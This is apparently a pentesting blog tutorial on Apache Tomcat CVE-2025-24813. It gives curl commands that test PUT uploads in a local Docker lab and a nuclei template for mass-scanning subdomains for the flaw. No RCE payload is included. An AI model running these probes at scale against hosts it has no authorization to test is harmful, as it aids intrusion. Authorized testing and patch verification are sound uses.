Introduction:
Apache Tomcat servers running vulnerable versions are currently exposed to a critical unauthenticated remote code execution (RCE) vulnerability – CVE-2025-24813. This flaw is caused by the PUT method being enabled by default, which allows an attacker to upload arbitrary files to the server. If exploited properly, this can lead to remote code execution.
Here’s a quick look at the affected versions:
- Apache Tomcat 11.0.0-M1 to 11.0.2
- Apache Tomcat 10.1.0-M1 to 10.1.34
- Apache Tomcat 9.0.0.M1 to 9.0.98
CVE-2025-24813 – Manual Exploitation
Before jumping into mass scanning and hunting, it’s important to understand the manual exploitation process. Knowing how the vulnerability works under the hood helps avoid false positives and also opens doors to bypass techniques.
We’ll be using a safe testing environment created by AlperenY-cs. It’s Docker-based, so make sure Docker is installed on your machine before continuing.
Clone the repository using the below command
git clone https://github.com/AlperenY-cs/CVE-2025-24813.git
cd CVE-2025-24813
Run the following command to build and start the vulnerable Apache Tomcat container
docker build -t v-tomcat .
docker run -d -p 1234:8080 --name tomcat-lab v-tomcat
If the ROOT folder is not created
docker exec -it tomcat-lab mkdir -p /usr/local/tomcat/webapps/ROOT
Make sure to check whether it’s working or not?
To check if the PUT method is allowed, use the OPTIONS request as given below.
curl -X OPTIONS -i http://localhost:1234
Try uploading file using the PUT method
curl -X PUT -H "Content-Type: application/octet-stream" --data-binary "poc -pentestguy" http://localhost:1234/poc
Verify the upload: If the response your custom text, it indicates that the upload was successful.
curl -X GET http://localhost:1234/poc
Mass hunting – CVE-2025-24813
Once you’re confident with manual testing, scale up with mass hunting. Start by gathering subdomains using tools like assetfinder, amass, or subfinder. If you’re unsure where to start, I’ve covered it in detail in my blog: Subdomain enumeration – a complete guide, and use the below nuclei template for automated detection.
id: CVE-2025-24813
info:
name: Apache Tomcat Partial PUT Remote Code Execution
author: pentestguy
severity: critical
description: |
Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34, and 11.0.0-M1 to 11.0.2 are vulnerable to remote code execution via the partial PUT feature under specific conditions.
reference:
- https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/
- https://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/
remediation: |
Upgrade to Apache Tomcat versions 9.0.99, 10.1.35, 11.0.3, or later. If upgrading is not possible, disable the partial PUT feature and ensure the default servlet does not have write permissions enabled.
requests:
- method: OPTIONS
path:
- "{{BaseURL}}/"
matchers:
- type: regex
part: header
regex:
- "Allow:.*PUT.*"
- method: PUT
path:
- "{{BaseURL}}/test.txt"
body: "This is a test file."
matchers:
- type: status
status:
- 201
- 204
- method: GET
path:
- "{{BaseURL}}/test.txt"
matchers:
- type: status
status:
- 200
- type: word
words:
- "This is a test file."
part: body
- method: DELETE
path:
- "{{BaseURL}}/test.txt"
matchers:
- type: status
status:
- 200
- 204
Conclusion:
CVE-2025-24813 is being actively exploited in the wild, so it’s definitely a hot target for bug bounty hunters and red teamers. The fact that it doesn’t require authentication and can result in RCE makes it even more critical. If you’re interested in collaborating with me on real-world testing, tool development, or writing together, feel free to reach out via Collaboration page. Thank you!!
